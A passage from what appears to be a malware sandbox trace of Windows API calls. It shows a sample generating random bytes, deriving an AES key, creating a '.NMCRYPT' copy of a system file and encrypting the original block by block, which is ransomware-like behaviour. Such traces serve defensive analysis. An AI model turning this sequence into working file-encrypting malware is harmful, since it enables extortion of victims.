pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.639] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0169.639] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0169.639] CryptCreateHash (in: hProv=0x8e3440, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0169.639] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.639] CryptDeriveKey (in: hProv=0x8e3440, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad138) returned 1 [0169.640] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0169.640] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0169.640] wcslen (_String="\\\\?\\") returned 0x4 [0169.640] CryptDuplicateKey (in: hKey=0x9ad138, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad578) returned 1 [0169.640] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0169.640] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0169.640] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=5120) returned 1 [0169.640] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0169.641] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.644] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.644] GetLastError () returned 0x0 [0169.644] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.652] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.652] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.652] GetLastError () returned 0x0 [0169.652] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.652] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.652] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.652] GetLastError () returned 0x0 [0169.652] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.652] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.652] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.652] GetLastError () returned 0x0 [0169.652] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.652] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.653] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.653] GetLastError () returned 0x0 [0169.653] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, 